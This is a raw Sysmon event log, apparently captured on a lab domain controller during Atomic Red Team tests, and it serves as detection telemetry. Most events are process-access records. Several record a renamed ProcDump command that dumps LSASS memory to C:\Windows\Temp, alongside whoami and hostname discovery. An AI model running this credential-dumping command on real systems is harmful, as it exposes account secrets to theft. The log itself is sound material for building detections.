KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180208Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180207Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180206Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-84F4-6019-2C05-00000000A301}19281400C:\Windows\system32\csrss.exe{29E67E80-D47C-601A-4B30-00000000A301}6808C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180205Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D47C-601A-4B30-00000000A301}6808C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000180204Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.057{29E67E80-D47C-601A-4B30-00000000A301}6808C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180203Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D47C-601A-4A30-00000000A301}6428C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180202Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180201Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180200Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180199Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180198Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-84F4-6019-2C05-00000000A301}19285340C:\Windows\system32\csrss.exe{29E67E80-D47C-601A-4A30-00000000A301}6428C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180197Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.040{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D47C-601A-4A30-00000000A301}6428C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000180196Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.042{29E67E80-D47C-601A-4A30-00000000A301}6428C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180245Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.681{29E67E80-D482-601A-4E30-00000000A301}61726660C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe+12722|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000180244Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.681{29E67E80-D482-601A-4E30-00000000A301}6172C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exeC:\Windows\Temp\lsass_dump.dmp2021-02-03 16:51:01.822 10341000x8000000000000000180243Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.681{29E67E80-D482-601A-4E30-00000000A301}61723700C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000180242Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-02-03 16:51:14.681{29E67E80-D482-601A-4E30-00000000A301}6172C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exeHKU\S-1-5-21-1645871015-3279536928-3104981001-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000180241Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D482-601A-4E30-00000000A301}6172C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180240Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-84F4-6019-2C05-00000000A301}19284632C:\Windows\system32\csrss.exe{29E67E80-D482-601A-4E30-00000000A301}6172C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180239Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180238Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180237Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180236Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180235Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.665{29E67E80-D482-601A-4D30-00000000A301}13601416C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe{29E67E80-D482-601A-4E30-00000000A301}6172C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x8000000000000000180234Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.666{29E67E80-D482-601A-4E30-00000000A301}6172C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdump"C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe" -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmpC:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe"C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe" -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x8000000000000000180233Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.localEXE2021-02-03 